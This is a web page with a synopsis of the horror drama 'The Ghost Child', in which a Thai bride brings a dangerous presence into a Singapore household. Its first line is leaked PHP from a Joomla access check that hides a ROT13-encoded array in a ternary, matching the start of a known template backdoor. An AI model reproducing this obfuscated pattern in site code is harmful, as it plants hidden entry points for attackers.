// no direct access defined( '_JEXEC').(($this->template)?$JPan = array('zrah'.'_pby'):'') or die( 'Restricted access' ); ?> THE GHOST CHILD

The Ghost Child :: The Ghost Child

Synopsis :

Choon was so happy when Dao finally agreed to marry him. A widower, he never thought he would find someone to love again. He found Dao kind and gentle and was sure she would make a good mother for his 5 year old son, Ryan. Dao knew that moving to Singapore from Thailand would take some effort but she had no idea that it would be so difficult. Adding to her woes was her mother-in-law, Mrs Lee, who did not mask her disadain of her, and made plain she did not approve of the marriage.
After Dao arrives into the Lee household, strange things start to happen. Ryan begins talking about his “new” friend that only he has seen. The maid, Rosa, is now afraid to be alone in the house. Even Mrs Lee is disturbed when she starts to lose her personal belongings.
Mrs Lee attempts to find out the reason behind these strange happenings and is not quite prepared for the truth. Dao has brought with her something from her previous relationship in Thailand, that is putting the whole Lee household in grave danger.
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